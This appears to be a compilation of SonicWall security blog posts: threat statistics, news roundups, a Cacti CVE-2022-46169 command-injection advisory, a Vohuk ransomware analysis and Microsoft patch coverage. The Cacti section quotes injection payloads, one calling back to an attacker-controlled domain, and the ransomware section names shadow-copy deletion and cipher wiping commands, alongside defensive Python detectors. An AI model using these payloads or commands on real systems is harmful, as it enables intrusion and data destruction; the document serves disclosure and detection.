Latest Threat Intelligence Tracks Shifting Cyber Frontlines in 2022

Few of 2021’s trends escaped 2022 unscathed. Here’s a quick look at the accelerations and reversals detailed in the 2023 SonicWall Cyber Threat Report.

With the pandemic finally relenting in many areas, employees returning to the safety of the perimeter and supply chains beginning to show signs of normalizing, many felt that 2022 would offer cybersecurity a return to the sort of stability that’s been largely absent the past few years.

Instead, we’ve seen the opposite: Cybercriminals have attempted to maximize the number of potential victims while minimizing risk — and this shift in tactics and targets has brought about the demise of years-long trends and begun to give rise to new cybercrime epicenters.

SonicWall Capture Labs threat researchers spent 2022 tracking these changes in real time, and have compiled their findings in the 2023 SonicWall Cyber Threat Report. This exclusive threat intelligence is designed to arm organizations against today’s ever-changing threat environment.

“The past year reinforced the need for cybersecurity in every industry and every facet of business, as threat actors targeted anything and everything, from education to retail to finance,” said SonicWall President and CEO Bob VanKirk. “While organizations face an increasing number of real-world obstacles with macroeconomic pressures and continued geopolitical strife, threat actors are shifting attack strategies at an alarming rate.”

Ransomware

In 2022, SonicWall Capture Labs threat researchers recorded 493.3 million ransomware attempts globally, a decrease of 21% year over year. This was fueled by a massive drop in North America, which typically sees the lion’s share of ransomware: attacks there fell by nearly half.

But while ransomware was down year-over-year, it remains at historic highs — total attack volume in 2022 was higher than in 2017, 2018, 2019 and 2020. These attacks impacted governments, enterprises, hospitals, airlines and schools throughout the year, resulting in economic loss, widespread system downtime, reputational damage and more. Some of these industries saw a significant uptick in ransomware volume, particularly education and finance, which saw spikes of 275% and 41%, respectively.

Malware

After three straight years of decline, malware reversed course in 2022, rising 2% to 5.5 billion. While this is a fairly modest increase, it’s being fueled by double-digit, accelerating growth in cryptojacking and IoT malware, which showed year-over-year increases of 43% and 87%, respectively.

The areas being targeted by malware are also changing rapidly. In 2022, countries that typically see more malware, such as the U.S., the U.K. and Germany, showed year-over-year decreases in attack volume. But Europe as a whole, Latin America and Asia — which all typically see significantly less malware than North America — all recorded significant increases.

IoT Malware

In 2022, SonicWall threat researchers observed 112.3 million IoT malware attempts, representing an 87% year-over-year increase and a new yearly record. While all regions and industries showed an increase in attack volume over 2021, some were hit particularly hard: Triple-digit increases were observed in North America, as well as in the education, retail and finance industries.

Cryptojacking

Cryptojacking attacks breezed past the 100 million mark for the first time in 2022, reaching a new high of 139.3 million. This 43% increase was fueled by a number of new campaigns that surfaced late in the year, pushing December to 30.36 million hits — a new monthly record and a total exceeding most entire quarters. Despite skyrocketing rates, some were fortunate enough to see welcome decreases, such as government and healthcare customers.

Apache Log4j

Another milestone was observed in intrusion attempts against the Apache Log4j ‘Log4Shell’ vulnerability, which passed the 1 billion mark in 2022. Since its discovery in December 2021, this vulnerability has been actively exploited, and the pace of these attempts seems to be accelerating: Every month in 2022 had significantly more attempts than were seen in December 2021, and 15% more hits were observed in Q2 than were seen in Q1.

Cybersecurity News & Trends – 02-24-2023

Curated cybersecurity news and trends from the industry’s leading bloggers and news outlets, for you from SonicWall.

We’re nearing the end of February, and SonicWall is still receiving positive press. Cyber Security Intelligence looked to SonicWall for data on higher education. CRN discussed SonicWall’s plans for 2023 and some of the features of the NSa 5700. Utah Pulse discussed our data on healthcare and education.

In industry news, Dark Reading reported on a U.S. military email server being exposed and Google bug bounty programs setting records. Hacker News has the scoop on the spam and phishing attacks at NPM. Bleeping Computer covered Activision’s phishing attack as well as a multi-year breach at GoDaddy.

Remember to keep your passwords close and your eyes peeled — cybersecurity is everyone’s responsibility.

SonicWall News

Cybersecurity Predictions for 2023 – Things You Should Know

Utah Pulse, SonicWall News: SonicWall reports a 328% YoY increase in healthcare ransomware attacks in 2022, and healthcare and education are expected to be among the most targeted sectors in 2023. The expanding IoT footprint in these sectors is predicted to make them more vulnerable to digital attacks, increasing the risk to critical infrastructure.

The 20 Coolest Network Security Companies Of 2023: The Security 100

CRN, SonicWall News: Key offer­ings from SonicWall in the realm of next-gener­ation firewalls include the SonicWall NSa 5700, which utilizes a scalable hardware architecture designed to fit in a single rack-mountable unit. The high port density of the NSa 5700 includes multiple 10-Gigabit Ether­net and 1-Gigabit Ethernet fiber and copper interfaces.

CEO Outlook 2023

CRN, SonicWall News: One of the biggest opportunities we will be tackling with our partners is providing a broader set of unified and cost-effective solutions that fully secure the evolving network perimeter. For many of our partners and customers, 2023 will represent a period of cautious and informed investment in IT and security – customers will demand more bang for their security buck.

Universities Targeted with Ransomware

Cyber Security Intelligence, SonicWall News: According to research carried out by threat analysts at SonicWall there was a 51% increase in ransomware attacks within the education sector in 2022. They predicted the education sector to be among the most targeted by cyber criminals in 2023. This is certainly proving to be true so far.

Ransomware Attacks Aimed at Manufacturing Grew By 50pc in 2022

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of SonicWall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Genie Out of The Bottle: ChatGPT Has Shaken Up the AI Sector

SiliconRepublic, SonicWall News: In recent AI predictions for 2023, experts such as Immanuel Chavoya of SonicWall said new software will give threat actors the ability to quickly exploit vulnerabilities and reduce the technical expertise required “down to a five-year-old level.”

Stolen MTU Data Appears on Dark Web Following IT Breach

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of SonicWall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Ryuk, Conti Ransomware Members Hit with UK Sanctions in Latest Crackdown

ITPro, SonicWall News: In 2020 – the third year of it being considered a major strain – security firm SonicWall revealed it was behind a third of ransomware attacks worldwide for the year.

Global Hacker Attack May Reach Brazil but Risk Is Limited, Says Experts

GQ Brasil, SonicWall News: Arley Brogiato, director for Latin America and the Caribbean of the multinational security company SonicWall, does not exclude the possibility of these attacks reaching Brazilian companies, but says he is surprised by the alerts and the dissemination of the news, which on the morning of last Monday (6) competed with football game calendars and the price of cooking gas in Manaus among the most sought-after Google Trends.

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition

SonicWall Blog, SonicWall News: SonicWall Chief Revenue Officer (CRO) Jason Carter and Vice President Americas Channel Sales Matt Brennan have been named to CRN’s 2023 Channel Chiefs list. Every year, CRN honors the IT channel executives who drive the channel success and evangelize the importance of channel partnerships within the IT industry.

Challenges For Startups in The IoT Sector

TechToday, SonicWall News: According to a report by SonicWall, 2.8 billion malware attacks were registered, up 11% in the first half of 2022, marking the first increase in global malware volume in over three years.

JD Sports Cyber Attack: Why Online Retail Is Vulnerable and What Can Be Done?

Charged Retail, SonicWall News: The JD Sports incident is yet another example of the rise in cyberattack incidents, with the retail industry experiencing a 90% increase in ransomware attacks last year, according to a report from SonicWall.

Industry News

Activision Breached Following Phishing Attack

Gaming giant Activision revealed that it was the victim of a data breach in December 2022 exposing employee and game information. According to Bleeping Computer, hackers gained access to its systems by using a phishing SMS that successfully tricked an employee. No source data or player information was exposed in the leak. A research group called VX-Underground claims that sensitive employee information, as well as the company’s release schedule up to November 2023, was stolen in the attack. Insider Gaming reported that the compromised employee was in the human resources department, which netted the attackers access to large amounts of sensitive employee data.

Google Bug Bounties Break Records

Last year, Google awarded more than $12 million to ethical hackers and researchers for bug bounties while addressing over 2,900 vulnerabilities in its products. According to Dark Reading, that total eclipses the previous year’s amount of $8.5 million. Bug bounties in the Android ecosystem alone netted white hats $4.8 million. Google released its annual Vulnerability Reward Program (VRP) report, and it showed that multiple segments of the VRP set records in 2022.

U.S. Military Emails Exposed Due to Password Mishap

A cloud-based email server for the Department of Defense spent two weeks without password protection, leaving it wide open to the public. A security researcher spotted the server and noticed sensitive information in the emails. According to Dark Reading, the email server appeared to be configured improperly. It’s not known whether anyone aside from the security researcher found the exposed data during the two-week period it was unprotected. No classified data was leaked from the server.

NPM Repository Attacked with Spam and Phishing Links

An attack on the widely used JavaScript package manager NPM has resulted in one of its repositories being flooded with over 15,000 spam packages. The threat actors were attempting to distribute phishing links on the open-source platform. According to Hacker News, the fake packages were attempting to pass themselves off as free goodies, with names like “free-tiktok-followers” or “free-xbox-codes.” The attackers used automation to publish a large number of packages quickly.

GoDaddy Reveals They Suffered Multi-year Breach

Popular web hosting company GoDaddy has been the victim of a multi-year breach that has resulted in their source code being stolen. GoDaddy says currently unknown attackers placed malware on their servers after infiltrating them. The attack was discovered in December 2022 when some GoDaddy users reported that their domains were now being redirected to random websites. While it was only discovered in December, GoDaddy revealed that the attackers had access to their networks for multiple years. According to Bleeping Computer, the breaches that GoDaddy experienced in November 2021 and March 2020 are related to this multi-year breach. GoDaddy has enlisted the help of external cybersecurity experts and law enforcement to investigate the cause of the incident.

SonicWall Blog

SonicWall Recognizes Bill Conner for Transition of Business, Impact on Cybersecurity Industry – Bret Fitzgerald

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition – Bret Fitzgerald

Can You Catch All the Phish? Take Our New Phishing IQ Quiz and Find Out! – Ken Dang

Celebrating 2023 With Expanded “3 & Free” – Matt Brennan

The Art of Cyber War: Sun Tzu and Cybersecurity – Ray Wyman

Talking Boundless Cybersecurity at the Schoolscape IT 2022 Conference – Mohamed Abdallah

SonicWall Included on the Acclaimed CRN Edge Computing 100 List for 2022 – Bret Fitzgerald

A New Era of Partnering to Win – Robert (Bob) VanKirk

Multiply Your Security with Multifactor Authentication – Amber Wolff

Cacti Command Injection Vulnerability

Cacti is an open-source, web-based network monitoring, performance, fault and configuration management framework designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

Cacti Command Injection Vulnerability | CVE-2022-46169

The command injection vulnerability exists in the remote_agent.php file.

As seen from the code fix, the vulnerability in Cacti exists in the way it processes a specific HTTP query associated with a particular type of polling “action” that is defined in the database. In Cacti, users can define actions to monitor a single host or “poller.” One of these poller types executes a PHP script, which expects correctly formatted return data. However, the vulnerability occurs because one of the query arguments used to execute these PHP scripts is not properly sanitized and is passed on to the execution call, resulting in command injection.

Here are some examples of exploits:

“poller_id=;ping%20-c%202%20whoami.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun”

This attempts to inject a command into the poller_id parameter by appending a semicolon (;) followed by a command that pings a domain controlled by the attacker. The command also relies on command substitution to execute whoami and insert its output into the command being executed. Its purpose is to send a ping request to the attacker-controlled domain whose name includes the result of whoami, which could be used to identify the user account running the Cacti remote agent script.

The part of the request reading touch+%2Ftmp%2FTMSR (URL-decoded: touch /tmp/TMSR) attempts to execute a shell command on the server that creates a file named TMSR in the /tmp/ directory using the touch command. This request is a malicious attempt to gain unauthorized access to the server running the Cacti network monitoring system.
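
An added detection example, not SonicWall’s IPS signature and not Cacti’s own fix: the Python below scans constructed web-server access-log lines for remote_agent.php requests whose poller_id is anything other than a plain integer or carries shell metacharacters. The integer rule, the log format and the sample lines are assumptions made here; the first payload is the one quoted above, the second mirrors the ping example with a placeholder callback domain.

```python
"""Flag suspicious requests to Cacti's remote_agent.php in web-server access logs.

Added, illustrative detection logic, not SonicWall's IPS 15808 and not Cacti's
own fix. Assumption taken from the write-up of CVE-2022-46169: the poller_id
query argument reached a shell execution call unsanitized, and a legitimate
poller_id is a plain integer, so anything else in that argument is suspicious.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Apache/nginx "combined" format: client, identity, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that terminate one shell command and start another, or substitute
# the output of one command into another.
SHELL_META = set(";|&`$()<>\n\r")


def parse_query(query: str) -> dict:
    """Split on '&' only and decode each key/value once (%XX and '+'), mirroring
    how PHP fills $_GET. Treating ';' as a separator too would split the payload
    ';touch /tmp/TMSR' into an empty poller_id and a harmless-looking extra key."""
    params: dict = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def analyse_request(target: str):
    """Return a finding for a suspicious remote_agent.php request, or None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/remote_agent.php"):
        return None
    values = parse_query(parts.query).get("poller_id", [])
    reasons = []
    for value in values:
        meta = sorted(SHELL_META & set(value))
        if meta:
            reasons.append(f"poller_id contains shell metacharacters {meta}")
        elif not value.isdigit():
            reasons.append(f"poller_id is not an integer: {value!r}")
    if not reasons:
        return None
    return {"path": parts.path, "poller_id": values, "reasons": reasons}


def scan_log(lines):
    """Run analyse_request over every parseable request line; return the findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        finding = analyse_request(m.group("target"))
        if finding:
            finding.update(client=m.group("client"), timestamp=m.group("ts"),
                           status=int(m.group("status")))
            findings.append(finding)
    return findings


# Constructed sample log. The first payload is the one quoted in the write-up;
# the second mirrors its ping example with a placeholder domain standing in for
# the attacker's callback host.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2023:08:15:02 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1 HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2023:08:16:41 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=;touch+%2Ftmp%2FTMSR HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2023:08:16:43 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20whoami.attacker-callback.example HTTP/1.1" 200 512
192.0.2.5 - - [10/Jan/2023:08:17:00 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 20480
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["timestamp"], f["client"], f["poller_id"], "; ".join(f["reasons"]))
```

Both malicious lines are flagged on the semicolon alone, so the check does not depend on recognising any particular injected command.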

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15808: Cacti remote_agent Command Injection

Cacti has patched this vulnerability.

Threat Graph

Vohuk Ransomware Uses Cipher.exe, Making File Recovery Impossible

Recently, the SonicWall Capture Labs Research team analyzed a ransomware family called Vohuk, which uses the legitimate Windows tool Cipher.exe to overwrite the data of deleted files, making recovery of the files impossible.

Cipher.exe is a command-line tool for managing encrypted data using the Encrypting File System (EFS). When a file or folder is deleted, the data itself is not erased; only the disk space it occupied is deallocated. Until that space is overwritten, the deleted data may be recoverable with a low-level disk editor or data-recovery software. Administrators use Cipher.exe to encrypt and decrypt data on drives that use the NTFS file system. During encryption, Windows makes a backup copy of the file so that the data is not lost if an error occurs; once encryption is complete, the backup copy is deleted, and as with any other deleted file, its data remains on disk until it is overwritten. To prevent unauthorized recovery of such data, Windows provides Cipher.exe with the ability to overwrite that deallocated space.

Vohuk uses this feature of Cipher.exe to overwrite the deleted data so that the original files cannot be recovered.

Infection Cycle:

At the start of execution it creates a named mutex “Global\\VohukMutes” to avoid running more than one instance of Vohuk ransomware on the same system.

It creates the folder C:\\ProgramData\\Vohuk, copies itself there as App.exe and also creates a log file that it uses to record its activity.

At the start of the Log.txt file it records its name and version, VohukCrypter V1.51.

The ransomware collects any command-line options passed to it at execution time. It checks for the following string options and changes its behaviour depending on which are present.

‘/NOKILL’
‘/NOMOUNT’
‘/NOEMPTY’
‘/LAN’
‘/NOLOCAL’
‘/NONETDRIVE’
‘/NOSTARTUP’
‘/FULL’
‘/FAST’
‘/PATH=’

The ransomware calls the GetSystemInfo API to obtain the number of processors present on the system.

The number of threads created depends on the number of processors, with one thread created per processor; if there are more than 64 processors, the ransomware creates at most 64 threads.

Before encrypting files, it first empties the Recycle Bins on all drives.

It launches a command prompt process and passes it a vssadmin command to delete the volume shadow copies.

The ransomware kills the processes listed below if they are found running on the system, so that it can encrypt files that are currently in use.

It also enumerates services and stops the services listed below, along with their dependent services, if they are found running on the system.

The ransomware uses multi-threading via the I/O completion port APIs CreateIoCompletionPort(), PostQueuedCompletionStatus() and GetQueuedCompletionStatus() to handle multiple files concurrently, and sets its thread priority to high for faster encryption.

The ransomware avoids encrypting files with the filenames listed below.

It also avoids encrypting files with the extensions listed below, so that normal functioning of the operating system is not hampered.

The ransomware checks file attributes before encryption; if a file is READ_ONLY, it clears the READ_ONLY attribute.

It encrypts the files, renames them with the extension “.Vohuk” and drops a ransom note named R3ADM3.txt in each folder.

Once encryption is complete, it runs the legitimate Windows tool Cipher.exe on all drives to overwrite the deleted data.

The ransomware also replaces the desktop wallpaper with its own.
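
An added example, not SonicWall’s signature or analysis code, of turning the behaviour above into a detection: the Python below correlates constructed Sysmon-style process-creation events per host and raises high severity only when a cipher.exe free-space wipe follows a vssadmin shadow-copy deletion on the same host. The event fields, the 30-minute window, the indicator names and the severity labels are assumptions made here; a lone cipher /w run is routine administrative disk sanitisation and is deliberately kept low severity.

```python
"""Correlate process-creation events for the Vohuk-style chain described above:
shadow-copy deletion via vssadmin followed by cipher.exe overwriting free space.

Added example, not SonicWall's GAV signature or analysis code. Event fields
(host, time, image, parent, cmdline) mimic Sysmon Event ID 1; the 30-minute
window and the severity labels are assumptions for illustration. A lone
cipher /w run is routine disk sanitisation by an administrator, so it is only
escalated when it follows shadow-copy deletion on the same host.
"""
import re
from datetime import datetime, timedelta

INDICATORS = {
    # Removes the restore points a victim would use to roll back encrypted files.
    "shadow_copy_deletion": re.compile(r"(?i)\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b"),
    # cipher.exe /w:<dir> overwrites deallocated space on that volume, destroying
    # the deleted originals left behind by encrypt-and-replace.
    "free_space_wipe": re.compile(r"(?i)\bcipher(?:\.exe)?\b.*\s[/-]w:"),
    # Staging location and copy name the analysis attributes to Vohuk.
    "vohuk_staging_path": re.compile(r"(?i)\\ProgramData\\Vohuk\\App\.exe"),
}


def parse_time(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def match_indicators(event: dict) -> list:
    """Names of every indicator whose pattern matches the image path or command line."""
    text = f"{event['image']} {event['cmdline']}"
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def correlate(events, window: timedelta = timedelta(minutes=30)) -> dict:
    """Return one verdict per host that produced at least one indicator hit.

    'chained' is True when a free-space wipe starts within `window` after a
    shadow-copy deletion on the same host; that sequence, not either event
    alone, is what earns the high severity."""
    hits = {}  # host -> list of (time, indicator name)
    for ev in events:
        for name in match_indicators(ev):
            hits.setdefault(ev["host"], []).append((parse_time(ev["time"]), name))

    verdicts = {}
    for host, host_hits in hits.items():
        names = sorted({name for _, name in host_hits})
        deletions = [t for t, name in host_hits if name == "shadow_copy_deletion"]
        wipes = [t for t, name in host_hits if name == "free_space_wipe"]
        chained = any(timedelta(0) <= w - d <= window for d in deletions for w in wipes)
        if chained:
            severity = "high"
        elif "vohuk_staging_path" in names:
            severity = "medium"
        else:
            severity = "low"  # single indicator: log it, do not page anyone
        verdicts[host] = {
            "severity": severity,
            "chained": chained,
            "attributed_to_vohuk": "vohuk_staging_path" in names,
            "indicators": names,
        }
    return verdicts


# Constructed sample events. WS-17 shows the chain from the analysis (/FULL is
# one of the documented command-line options); FS-02 is an administrator
# sanitising a decommissioned volume, which must not trigger the same alert.
SAMPLE_EVENTS = [
    {"host": "WS-17", "time": "2023-02-20T09:14:02Z",
     "image": "C:\\ProgramData\\Vohuk\\App.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "\"C:\\ProgramData\\Vohuk\\App.exe\" /FULL"},
    {"host": "WS-17", "time": "2023-02-20T09:14:05Z",
     "image": "C:\\Windows\\System32\\cmd.exe", "parent": "C:\\ProgramData\\Vohuk\\App.exe",
     "cmdline": "cmd.exe /c vssadmin delete shadows /all /quiet"},
    {"host": "WS-17", "time": "2023-02-20T09:21:40Z",
     "image": "C:\\Windows\\System32\\cipher.exe", "parent": "C:\\ProgramData\\Vohuk\\App.exe",
     "cmdline": "cipher.exe /w:C:\\"},
    {"host": "WS-17", "time": "2023-02-20T09:22:10Z",
     "image": "C:\\Windows\\System32\\cipher.exe", "parent": "C:\\ProgramData\\Vohuk\\App.exe",
     "cmdline": "cipher.exe /w:D:\\"},
    {"host": "FS-02", "time": "2023-02-20T13:02:11Z",
     "image": "C:\\Windows\\System32\\cipher.exe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cipher /W:D:\\Decommission"},
]

if __name__ == "__main__":
    for host, verdict in correlate(SAMPLE_EVENTS).items():
        print(host, verdict)
```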

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: VohukCrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 02-17-2023

Curated cybersecurity news and trends from the industry’s leading bloggers and news outlets, for you from SonicWall.

It’s Valentine’s week, and SonicWall is getting love from media outlets once again. SiliconRepublic talked to our own Spencer Starkey about his predictions for 2023 and quoted Immanuel Chavoya’s thoughts on artificial intelligence.

In industry news, Bleeping Computer has the low-down on Apple and Microsoft’s zero-day issues and has informed us of another zero-day exploit that was used to breach 130 organizations. Dark Reading reported on a former cybersecurity entrepreneur from Russia being convicted of a hack-to-trade scheme. Hacker News warns of a North Korean threat actor targeting South Korean systems as well as a flurry of attacks from the notorious SideWinder group.

Remember to keep your passwords close and your eyes peeled — cybersecurity is everyone’s responsibility.

SonicWall News

Ransomware Attacks Aimed at Manufacturing Grew By 50pc in 2022

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of SonicWall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Genie Out of The Bottle: ChatGPT Has Shaken Up the AI Sector

SiliconRepublic, SonicWall News: In recent AI predictions for 2023, experts such as Immanuel Chavoya of SonicWall said new software will give threat actors the ability to quickly exploit vulnerabilities and reduce the technical expertise required “down to a five-year-old level.”

Stolen MTU Data Appears on Dark Web Following IT Breach

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of SonicWall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Ryuk, Conti Ransomware Members Hit with UK Sanctions in Latest Crackdown

ITPro, SonicWall News: In 2020 – the third year of it being considered a major strain – security firm SonicWall revealed it was behind a third of ransomware attacks worldwide for the year.

Global Hacker Attack May Reach Brazil but Risk Is Limited, Says Experts

GQ Brasil, SonicWall News: Arley Brogiato, director for Latin America and the Caribbean of the multinational security company SonicWall, does not exclude the possibility of these attacks reaching Brazilian companies, but says he is surprised by the alerts and the dissemination of the news, which on the morning of last Monday (6) competed with football game calendars and the price of cooking gas in Manaus among the most sought-after Google Trends.

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition

SonicWall Blog, SonicWall News: SonicWall Chief Revenue Officer (CRO) Jason Carter and Vice President Americas Channel Sales Matt Brennan have been named to CRN’s 2023 Channel Chiefs list. Every year, CRN honors the IT channel executives who drive the channel success and evangelize the importance of channel partnerships within the IT industry.

Challenges For Startups in The IoT Sector

TechToday, SonicWall News: According to a report by SonicWall, 2.8 billion malware attacks were registered, up 11% in the first half of 2022, marking the first increase in global malware volume in over three years.

JD Sports Cyber Attack: Why Online Retail Is Vulnerable and What Can Be Done?

Charged Retail, SonicWall News: The JD Sports incident is yet another example of the rise in cyberattack incidents, with the retail industry experiencing a 90% increase in ransomware attacks last year, according to a report from SonicWall.

The Best Hardware Firewalls for Small Businesses

Ask by Geeks, SonicWall News: One of the best small business firewalls is the SonicWall TZ400 Security Firewall. The SonicWall TZ400 NGFW Premium is considered a little more expensive than other firewall options, but its security, reliability, ease of use, and unique features justify its price.

10 million Customers Exposed in JD Sports Cyber Attack

ITPro, SonicWall News: A study last year by SonicWall found that the retail sector saw a 264% surge in ransomware attacks between February 2021 and 2022. The widespread consumer shift to online shopping during the pandemic prompted hackers to escalate attacks against online retailers.

Three Ways Governments Can Better Protect Public Data

Networking+, SonicWall News: The chances of being hit by a ransomware attack are more significant than ever. Last year, global ransomware volume skyrocketed by 105% year over year, according to the 2022 SonicWall Cyber Threat Report. While no industry was spared, the numbers were particularly gruesome for governments. Ransomware attempts on government entities rose a staggering 1,885%. That’s more than double the increase reported by healthcare (755%), education (152%), and retail (21%) combined.

2023 Predictions: Emerging Tech & Global Conflict Bring New Cyber Threats

CyberSecurityInsiders, SonicWall News: 2022 saw a shifting cybersecurity landscape as rising geopolitical conflicts brought new tactics, targets, and goals for cybercrime. According to recent threat intelligence from SonicWall, global ransomware attempts declined 31% YoY as cybercriminals and nation-state actors opted for never-before-seen malware variants, IoT malware, and cryptojacking in attacks motivated by financial gain and state-sponsored hacktivism.

Cybersecurity ‘More Critical Than Ever’ In Era of Connected Care: BD

MedTechDive, SonicWall News: Ransomware attacks in which cybercriminals attempt to extort money declined by 23% overall during the first half of 2022 but increased 328% in healthcare, according to data from cybersecurity company SonicWall.

Industry News

SideWinder Group Responsible for Over 60 Attacks According to Researchers

The notorious threat actor group known as SideWinder has been linked to 61 attacks across Sri Lanka, Bhutan, Nepal, Afghanistan and Myanmar. According to Hacker News, the group’s targets include government, finance, military and other organizations. Its typical attacks start with a spear-phishing email that includes a bogus URL. The URL directs victims to a site where the main malware is dropped onto their computer. It was also stated that SideWinder has added new tools to its threat arsenal. The ability to reload and retool so frequently suggests that SideWinder has considerable financial backing – perhaps even from a nation-state.

CISA Warns of Zero-days Being Exploited On iOS and Windows

Four new exploits were added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of exploits found in the wild this week. Three of them affected Microsoft products, and Microsoft patched all three on Tuesday as part of their February 2022 patch. The fourth affected WebKit on Apple devices and was acknowledged by Apple on Monday. Apple released emergency security updates to address the issues. According to Bleeping Computer, CISA has now given U.S. federal agencies until March 7th to patch all four exploits.

Clop Ransomware Gang Uses Zero-Day to Breach 130 Organizations

A zero-day vulnerability in the GoAnywhere MFT secure file transfer tool has been exploited in the wild. The exploit allowed the attackers to execute code remotely on the compromised systems. According to Bleeping Computer, the ransomware gang known as Clop reached out last week to inform BleepingComputer that it had already used this vulnerability to breach 130 organizations. The gang refused to say whether it had begun demanding ransoms from its victims. Reporter Brian Krebs reported that GoAnywhere MFT had warned of this exploit last week. Fortra, the developer of GoAnywhere MFT, said, “We are working directly with customers to assess their individual potential impact, apply mitigations and restore systems.” The full impact of the breaches is still unknown.

Tesla, Roku Hacker from Russia Faces Decades in Prison

Vladislav Klyushin has been found guilty by a U.S. district court of crimes involving information theft from U.S. networks. Klyushin is a former cybersecurity businessman from Russia. According to a release from the United States Justice Department, Klyushin was arrested in Sion, Switzerland, in 2021 before being sent to the U.S. to stand trial. U.S. attorney Rachael S. Rollins said, “For nearly three years, he and his co-conspirators repeatedly hacked into U.S. computer networks to obtain tomorrow’s headlines today.” Klyushin and his co-conspirators used the stolen information to make money through insider trading. According to Dark Reading, the charges of securities fraud and wire fraud could each put him behind bars for 20 years. Klyushin will face sentencing on May 4th.

North Korean Threat Actor Targeting South Korea with Malware

A threat actor linked to North Korea has been caught targeting South Korea with new malware. Researchers are calling the new malware M2RAT, and the threat actor is tracked as APT37. According to Hacker News, this group is also tracked under the monikers ScarCruft, Ricochet Chollima, Red Eyes and Reaper. The new malware was observed in January 2023, and it uses a now-patched vulnerability in the South Korean word processor Hangul. This same vulnerability was exploited in 2017 by the North Korean Lazarus group to target South Korean cryptocurrency exchanges.

SonicWall Blog

SonicWall Recognizes Bill Conner for Transition of Business, Impact on Cybersecurity Industry – Bret Fitzgerald

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition – Bret Fitzgerald

Can You Catch All the Phish? Take Our New Phishing IQ Quiz and Find Out! – Ken Dang

Celebrating 2023 With Expanded “3 & Free” – Matt Brennan

‘3 & Free’ Promotion: How to Upgrade to a New SonicWall TZ Series NGFW for Free – Matt Brennan

The Art of Cyber War: Sun Tzu and Cybersecurity – Ray Wyman

3 & Free: 1 Amazing Deal, 2 Exceptional Firewalls, 3 Years of Superior Threat Protection – Matt Brennan

SonicWall Included on the Acclaimed CRN Edge Computing 100 List for 2022 – Bret Fitzgerald

A New Era of Partnering to Win – Robert (Bob) VanKirk

Multiply Your Security with Multifactor Authentication – Amber Wolff

10 Reasons to Upgrade to the Latest SonicWall Gen 7 TZ Firewall – Sarah Choi

Microsoft Security Bulletin Coverage for February 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-21529 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 3520: Microsoft Exchange Server Remote Code Execution (CVE-2023-21529)

CVE-2023-21688 NT OS Kernel Elevation of Privilege Vulnerability
ASPY 403: Malicious-exe exe.MP_297

CVE-2023-21689 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 404: Malicious-exe exe.MP_298

CVE-2023-21690 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 405: Malicious-exe exe.MP_299

CVE-2023-21692 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 406: Malicious-exe exe.MP_300

CVE-2023-21706 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15834: Microsoft Exchange Server Remote Code Execution (CVE-2023-21706)

CVE-2023-21715 Microsoft Office Security Feature Bypass Vulnerability
ASPY 410: Malformed-File pub.MP.6

CVE-2023-21812 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 409: Malicious-exe exe.MP_303

CVE-2023-21823 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 408: Malicious-exe exe.MP_302

CVE-2023-23376 Windows Common Log File System Driver Elevation of Privilege Vulnerability
